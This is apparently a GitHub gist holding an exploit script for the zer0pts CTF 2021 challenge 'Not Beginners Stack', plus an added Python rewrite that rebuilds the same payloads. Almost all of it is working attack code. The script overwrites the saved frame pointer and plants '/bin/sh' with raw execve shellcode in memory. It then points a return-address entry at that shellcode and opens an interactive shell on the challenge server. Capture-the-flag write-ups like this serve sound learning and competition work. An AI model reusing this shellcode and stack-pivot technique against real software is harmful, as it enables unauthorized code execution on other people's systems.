@farazsth98
Created March 7, 2021 12:04
zer0pts CTF 2021 - Not Beginners Stack
#!/usr/bin/env python3
from pwn import *

#p = process("./chall")
p = remote("pwn.ctf.zer0pts.com", 9011)
#gdb.attach(p)

# First read: fill the 0x100-byte buffer, then overwrite the low 6 bytes of the
# saved rbp so it points at the return-address array (0x600234) + 0xd0 = 0x600304.
p.sendafter(b"Data: ", b"A"*0x100 + p64(0x600234+0xd0)[:6])

# Second read: the data is stored at rbp-0x100 = 0x600204, so "/bin/sh" lands at
# 0x600204 and the shellcode directly after it at 0x60020c.
#   mov rdi, 0x600204 ; xor rsi, rsi ; xor rdx, rdx ; mov rax, 0x3b ; syscall
# i.e. execve("/bin/sh", NULL, NULL)
shellcode = b"\x48\xC7\xC7\x04\x02\x60\x00\x48\x31\xF6\x48\x31\xD2\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05"
payload = b"/bin/sh\x00" + shellcode

# Pad up to the index variable that sits right before the return-address array.
payload += b"AA"
payload += b"A"*8
# Set the index to 2; it is set to 1 before the array is accessed, so entry 1 is used.
payload += b"\x00\x00\x02\x00\x00\x00\x00\x00"
# Entry 0 of the array (never used)
payload += b"B"*8
# Entry 1 of the array: address of our shellcode
payload += p64(0x600204+8)

p.sendafter(b"Data: ", payload)
p.interactive()
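The same two payloads rebuilt without pwntools, as an added example that is not part of farazsth98's gist: the execve shellcode is generated from the /bin/sh address instead of being pasted as bytes, and the address of every field is computed from the gist's constants (return-address array at 0x600234, saved rbp set to that + 0xd0, second read stored at rbp-0x100). The field layout (index variable at +40 and array at +48 of the written block) and the exact index bytes are taken from the gist's payload and are assumptions about the challenge binary, which this example does not inspect.

```python
import struct

# Constants as used in the gist (zer0pts CTF 2021, Not Beginners Stack).
RET_ARRAY = 0x600234      # return-address array on the stack-like region
RBP_OFFSET = 0xd0         # saved rbp is redirected to RET_ARRAY + 0xd0
READ_SIZE = 0x100         # the second read stores its data at rbp - 0x100

# Offsets inside the second payload, assumed from the gist's layout.
INDEX_OFF = 40            # index variable, directly before the array
ARRAY_OFF = 48            # ret[0]; ret[1] follows at +56


def p64(x):
    return struct.pack("<Q", x)


def execve_shellcode(binsh_addr):
    """x86-64 Linux execve(binsh_addr, 0, 0); same encoding as the gist's bytes.

    'mov rdi, imm32' sign-extends, so the string address must be < 0x80000000,
    which holds for the non-PIE region the gist targets.
    """
    if not 0 <= binsh_addr < 0x80000000:
        raise ValueError("address does not fit a sign-extended imm32")
    return (b"\x48\xc7\xc7" + struct.pack("<I", binsh_addr)  # mov rdi, binsh_addr
            + b"\x48\x31\xf6"                                 # xor rsi, rsi
            + b"\x48\x31\xd2"                                 # xor rdx, rdx
            + b"\x48\xc7\xc0\x3b\x00\x00\x00"                 # mov rax, 0x3b (execve)
            + b"\x0f\x05")                                    # syscall


def first_payload(target_rbp=RET_ARRAY + RBP_OFFSET):
    """Fill the 0x100-byte buffer, then overwrite the low 6 bytes of saved rbp."""
    return b"A" * READ_SIZE + p64(target_rbp)[:6]


def field_addresses(write_base=RET_ARRAY + RBP_OFFSET - READ_SIZE):
    """Absolute address of each field once the second payload is stored at write_base."""
    return {
        "binsh": write_base,
        "shellcode": write_base + 8,
        "index": write_base + INDEX_OFF,
        "ret0": write_base + ARRAY_OFF,
        "ret1": write_base + ARRAY_OFF + 8,
    }


def second_payload(write_base=RET_ARRAY + RBP_OFFSET - READ_SIZE):
    """Data stored at rbp - 0x100: "/bin/sh", shellcode, index, ret[0], ret[1]."""
    addrs = field_addresses(write_base)
    body = b"/bin/sh\x00" + execve_shellcode(addrs["binsh"])
    body += b"A" * (INDEX_OFF - len(body))      # pad to the index variable
    body += b"\x00\x00\x02\x00\x00\x00\x00\x00"  # index bytes exactly as in the gist
    body += b"B" * 8                             # ret[0], never used
    body += p64(addrs["shellcode"])              # ret[1] -> shellcode
    assert len(body) == ARRAY_OFF + 16
    return body


if __name__ == "__main__":
    for name, addr in field_addresses().items():
        print(f"{name:10s} {addr:#x}")
    print("payload 1:", first_payload().hex())
    print("payload 2:", second_payload().hex())
```

With the defaults, `second_payload()` is byte-for-byte the gist's second payload and `field_addresses()["ret0"]` comes out at 0x600234, which is why the gist computes the new rbp as that array address plus 0xd0: the 0x100-byte read then starts exactly 0x30 bytes before the array, leaving room for the string, the shellcode and the index variable.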